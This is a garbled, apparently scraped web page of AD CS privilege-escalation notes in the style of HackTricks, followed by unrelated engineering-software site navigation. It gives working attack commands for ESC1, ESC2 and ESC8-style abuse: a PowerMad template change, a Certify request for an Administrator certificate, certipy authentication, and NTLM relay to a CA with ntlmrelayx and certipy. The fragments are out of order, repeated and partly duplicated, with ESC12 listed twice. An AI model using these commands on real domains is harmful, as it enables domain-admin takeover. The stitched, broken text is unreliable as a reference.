Hacktricks Adcs Instant

# Using PowerMad (Set-PKITemplate -Identity VulnTemplate -EnrolleeSuppliesSubject $true -AddEKUs @("Client Authentication")) Condition : CA is configured with EDITF_ATTRIBUTESUBJECTALTNAME2 flag. (Allows any requester to specify SAN.)

# Request a certificate for a domain admin (using Certify) Certify.exe request /ca:dc.contoso.local\CONTOSO-CA /template:UserSAN /altname:Administrator certipy auth -pfx administrator.pfx -domain contoso.local hacktricks adcs

: Relaying NTLM to CA endpoints (see ESC8). ESC11 – If the CA allows HTTP (instead of mandatory HTTPS) Same as ESC8. ESC12 – CA Holder Compromise (via AD CS Web Enrollment, no hardening) Allows remote attackers to capture NTLM hashes or relay authentication. ESC13 – Dangerous Certificate Template with Extra EKU that Enables Domain Controller Authentication Some templates include EKUs like “Domain Controller Authentication” (1.3.6.1.4.1.311.20.2.2) combined with low enrollment rights. ESC12 – CA Holder Compromise (via AD CS

: Request any template with Client Authentication EKU and include SAN. : Immediate domain admin access via Kerberos authentication

: Immediate domain admin access via Kerberos authentication. ESC2 – Certificate Template Allows Any EKU Condition : Template defines Any Purpose EKU (2.5.29.37.0) and allows low-priv enrollment.

# Relay NTLM auth from a compromised host to ADCS ntlmrelayx.py -t http://ca.contoso.com/certsrv/certfnsh.asp -smb2support --adcs --template DomainController certipy relay -target http://ca.contoso.com -template DomainController

(using ntlmrelayx.py from Impacket):

Software

SkyCiv Software

Industries
Free Tools
About

About

captera structural engineering review
Go to Top